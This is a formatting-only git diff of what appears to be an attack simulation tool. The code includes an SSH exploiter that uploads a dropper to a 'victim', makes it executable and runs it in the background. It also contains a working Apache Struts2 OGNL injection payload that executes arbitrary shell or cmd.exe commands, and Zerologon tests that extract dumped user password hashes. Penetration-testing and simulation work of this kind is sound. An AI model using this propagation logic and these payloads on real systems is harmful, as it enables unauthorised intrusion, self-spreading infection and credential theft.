else:
|
else:
|
||||||
LOG.info("SSH Skipping unknown os: %s", uname_os)
|
LOG.info("SSH Skipping unknown os: %s", uname_os)
|
||||||
return False
|
return False
|
||||||
|
@ -132,21 +140,25 @@ class SSHExploiter(HostExploiter):
|
||||||
LOG.debug("Error running uname os command on victim %r: (%s)", self.host, exc)
|
LOG.debug("Error running uname os command on victim %r: (%s)", self.host, exc)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
if not self.host.os.get('machine'):
|
if not self.host.os.get("machine"):
|
||||||
try:
|
try:
|
||||||
_, stdout, _ = ssh.exec_command('uname -m')
|
_, stdout, _ = ssh.exec_command("uname -m")
|
||||||
uname_machine = stdout.read().lower().strip().decode()
|
uname_machine = stdout.read().lower().strip().decode()
|
||||||
if '' != uname_machine:
|
if "" != uname_machine:
|
||||||
self.host.os['machine'] = uname_machine
|
self.host.os["machine"] = uname_machine
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error running uname machine command on victim %r: (%s)", self.host, exc)
|
LOG.debug("Error running uname machine command on victim %r: (%s)", self.host, exc)
|
||||||
|
|
||||||
if self.skip_exist:
|
if self.skip_exist:
|
||||||
_, stdout, stderr = ssh.exec_command("head -c 1 %s" % self._config.dropper_target_path_linux)
|
_, stdout, stderr = ssh.exec_command(
|
||||||
|
"head -c 1 %s" % self._config.dropper_target_path_linux
|
||||||
|
)
|
||||||
stdout_res = stdout.read().strip()
|
stdout_res = stdout.read().strip()
|
||||||
if stdout_res:
|
if stdout_res:
|
||||||
# file exists
|
# file exists
|
||||||
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
LOG.info(
|
||||||
|
"Host %s was already infected under the current configuration, done" % self.host
|
||||||
|
)
|
||||||
return True # return already infected
|
return True # return already infected
|
||||||
|
|
||||||
src_path = get_target_monkey(self.host)
|
src_path = get_target_monkey(self.host)
|
||||||
|
@ -160,33 +172,44 @@ class SSHExploiter(HostExploiter):
|
||||||
|
|
||||||
self._update_timestamp = time.time()
|
self._update_timestamp = time.time()
|
||||||
with monkeyfs.open(src_path) as file_obj:
|
with monkeyfs.open(src_path) as file_obj:
|
||||||
ftp.putfo(file_obj, self._config.dropper_target_path_linux, file_size=monkeyfs.getsize(src_path),
|
ftp.putfo(
|
||||||
callback=self.log_transfer)
|
file_obj,
|
||||||
|
self._config.dropper_target_path_linux,
|
||||||
|
file_size=monkeyfs.getsize(src_path),
|
||||||
|
callback=self.log_transfer,
|
||||||
|
)
|
||||||
ftp.chmod(self._config.dropper_target_path_linux, 0o777)
|
ftp.chmod(self._config.dropper_target_path_linux, 0o777)
|
||||||
status = ScanStatus.USED
|
status = ScanStatus.USED
|
||||||
T1222Telem(ScanStatus.USED, "chmod 0777 %s" % self._config.dropper_target_path_linux, self.host).send()
|
T1222Telem(
|
||||||
|
ScanStatus.USED,
|
||||||
|
"chmod 0777 %s" % self._config.dropper_target_path_linux,
|
||||||
|
self.host,
|
||||||
|
).send()
|
||||||
ftp.close()
|
ftp.close()
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error uploading file into victim %r: (%s)", self.host, exc)
|
LOG.debug("Error uploading file into victim %r: (%s)", self.host, exc)
|
||||||
status = ScanStatus.SCANNED
|
status = ScanStatus.SCANNED
|
||||||
|
|
||||||
T1105Telem(status,
|
T1105Telem(
|
||||||
get_interface_to_target(self.host.ip_addr),
|
status, get_interface_to_target(self.host.ip_addr), self.host.ip_addr, src_path
|
||||||
self.host.ip_addr,
|
).send()
|
||||||
src_path).send()
|
|
||||||
if status == ScanStatus.SCANNED:
|
if status == ScanStatus.SCANNED:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
try:
|
try:
|
||||||
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
|
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
|
||||||
cmdline += build_monkey_commandline(self.host,
|
cmdline += build_monkey_commandline(
|
||||||
get_monkey_depth() - 1,
|
self.host, get_monkey_depth() - 1, vulnerable_port=SSH_PORT
|
||||||
vulnerable_port=SSH_PORT)
|
)
|
||||||
cmdline += " > /dev/null 2>&1 &"
|
cmdline += " > /dev/null 2>&1 &"
|
||||||
ssh.exec_command(cmdline)
|
ssh.exec_command(cmdline)
|
||||||
|
|
||||||
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
LOG.info(
|
||||||
self._config.dropper_target_path_linux, self.host, cmdline)
|
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||||
|
self._config.dropper_target_path_linux,
|
||||||
|
self.host,
|
||||||
|
cmdline,
|
||||||
|
)
|
||||||
|
|
||||||
ssh.close()
|
ssh.close()
|
||||||
self.add_executed_cmd(cmdline)
|
self.add_executed_cmd(cmdline)
|
||||||
|
|
|
@ -21,15 +21,15 @@ DOWNLOAD_TIMEOUT = 300
|
||||||
|
|
||||||
|
|
||||||
class Struts2Exploiter(WebRCE):
|
class Struts2Exploiter(WebRCE):
|
||||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
_TARGET_OS_TYPE = ["linux", "windows"]
|
||||||
_EXPLOITED_SERVICE = 'Struts2'
|
_EXPLOITED_SERVICE = "Struts2"
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(Struts2Exploiter, self).__init__(host, None)
|
super(Struts2Exploiter, self).__init__(host, None)
|
||||||
|
|
||||||
def get_exploit_config(self):
|
def get_exploit_config(self):
|
||||||
exploit_config = super(Struts2Exploiter, self).get_exploit_config()
|
exploit_config = super(Struts2Exploiter, self).get_exploit_config()
|
||||||
exploit_config['dropper'] = True
|
exploit_config["dropper"] = True
|
||||||
return exploit_config
|
return exploit_config
|
||||||
|
|
||||||
def build_potential_urls(self, ports, extensions=None):
|
def build_potential_urls(self, ports, extensions=None):
|
||||||
|
@ -47,10 +47,12 @@ class Struts2Exploiter(WebRCE):
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_redirected(url):
|
def get_redirected(url):
|
||||||
# Returns false if url is not right
|
# Returns false if url is not right
|
||||||
headers = {'User-Agent': 'Mozilla/5.0'}
|
headers = {"User-Agent": "Mozilla/5.0"}
|
||||||
request = urllib.request.Request(url, headers=headers)
|
request = urllib.request.Request(url, headers=headers)
|
||||||
try:
|
try:
|
||||||
return urllib.request.urlopen(request, context=ssl._create_unverified_context()).geturl()
|
return urllib.request.urlopen(
|
||||||
|
request, context=ssl._create_unverified_context()
|
||||||
|
).geturl()
|
||||||
except urllib.error.URLError:
|
except urllib.error.URLError:
|
||||||
LOG.error("Can't reach struts2 server")
|
LOG.error("Can't reach struts2 server")
|
||||||
return False
|
return False
|
||||||
|
@ -63,24 +65,26 @@ class Struts2Exploiter(WebRCE):
|
||||||
"""
|
"""
|
||||||
cmd = re.sub(r"\\", r"\\\\", cmd)
|
cmd = re.sub(r"\\", r"\\\\", cmd)
|
||||||
cmd = re.sub(r"'", r"\\'", cmd)
|
cmd = re.sub(r"'", r"\\'", cmd)
|
||||||
payload = "%%{(#_='multipart/form-data')." \
|
payload = (
|
||||||
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
|
"%%{(#_='multipart/form-data')."
|
||||||
"(#_memberAccess?" \
|
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
|
||||||
"(#_memberAccess=#dm):" \
|
"(#_memberAccess?"
|
||||||
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \
|
"(#_memberAccess=#dm):"
|
||||||
"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \
|
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
|
||||||
"(#ognlUtil.getExcludedPackageNames().clear())." \
|
"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
|
||||||
"(#ognlUtil.getExcludedClasses().clear())." \
|
"(#ognlUtil.getExcludedPackageNames().clear())."
|
||||||
"(#context.setMemberAccess(#dm))))." \
|
"(#ognlUtil.getExcludedClasses().clear())."
|
||||||
"(#cmd='%s')." \
|
"(#context.setMemberAccess(#dm))))."
|
||||||
"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \
|
"(#cmd='%s')."
|
||||||
"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
|
"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
|
||||||
"(#p=new java.lang.ProcessBuilder(#cmds))." \
|
"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
|
||||||
"(#p.redirectErrorStream(true)).(#process=#p.start())." \
|
"(#p=new java.lang.ProcessBuilder(#cmds))."
|
||||||
"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \
|
"(#p.redirectErrorStream(true)).(#process=#p.start())."
|
||||||
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
|
"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
|
||||||
"(#ros.flush())}" % cmd
|
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
|
||||||
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
|
"(#ros.flush())}" % cmd
|
||||||
|
)
|
||||||
|
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
|
||||||
try:
|
try:
|
||||||
request = urllib.request.Request(url, headers=headers)
|
request = urllib.request.Request(url, headers=headers)
|
||||||
# Timeout added or else we would wait for all monkeys' output
|
# Timeout added or else we would wait for all monkeys' output
|
||||||
|
|
|
@ -28,9 +28,7 @@ def zerologon_exploiter_object(monkeypatch):
|
||||||
|
|
||||||
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
|
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
|
||||||
dummy_exploit_attempt_result = {"ErrorCode": 0}
|
dummy_exploit_attempt_result = {"ErrorCode": 0}
|
||||||
assert zerologon_exploiter_object.assess_exploit_attempt_result(
|
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result)
|
||||||
dummy_exploit_attempt_result
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
|
def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
|
||||||
|
@ -56,8 +54,7 @@ def test_assess_restoration_attempt_result_not_restored(zerologon_exploiter_obje
|
||||||
|
|
||||||
def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object):
|
def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object):
|
||||||
mock_dumped_secrets = [
|
mock_dumped_secrets = [
|
||||||
f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::"
|
f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
|
||||||
for i in range(len(USERS))
|
|
||||||
]
|
]
|
||||||
expected_extracted_creds = {
|
expected_extracted_creds = {
|
||||||
USERS[0]: {
|
USERS[0]: {
|
||||||
|
@ -71,24 +68,17 @@ def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object):
|
||||||
"nt_hash": NT_HASHES[1],
|
"nt_hash": NT_HASHES[1],
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
assert (
|
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
|
||||||
zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets)
|
|
||||||
is None
|
|
||||||
)
|
|
||||||
assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds
|
assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds
|
||||||
|
|
||||||
|
|
||||||
def test__extract_user_creds_from_secrets_bad_data(zerologon_exploiter_object):
|
def test__extract_user_creds_from_secrets_bad_data(zerologon_exploiter_object):
|
||||||
mock_dumped_secrets = [
|
mock_dumped_secrets = [
|
||||||
f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::"
|
f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
|
||||||
for i in range(len(USERS))
|
|
||||||
]
|
]
|
||||||
expected_extracted_creds = {
|
expected_extracted_creds = {
|
||||||
USERS[0]: {"RID": int(RIDS[0]), "lm_hash": "", "nt_hash": ""},
|
USERS[0]: {"RID": int(RIDS[0]), "lm_hash": "", "nt_hash": ""},
|
||||||
USERS[1]: {"RID": int(RIDS[1]), "lm_hash": "", "nt_hash": ""},
|
USERS[1]: {"RID": int(RIDS[1]), "lm_hash": "", "nt_hash": ""},
|
||||||
}
|
}
|
||||||
assert (
|
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
|
||||||
zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets)
|
|
||||||
is None
|
|
||||||
)
|
|
||||||
assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds
|
assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue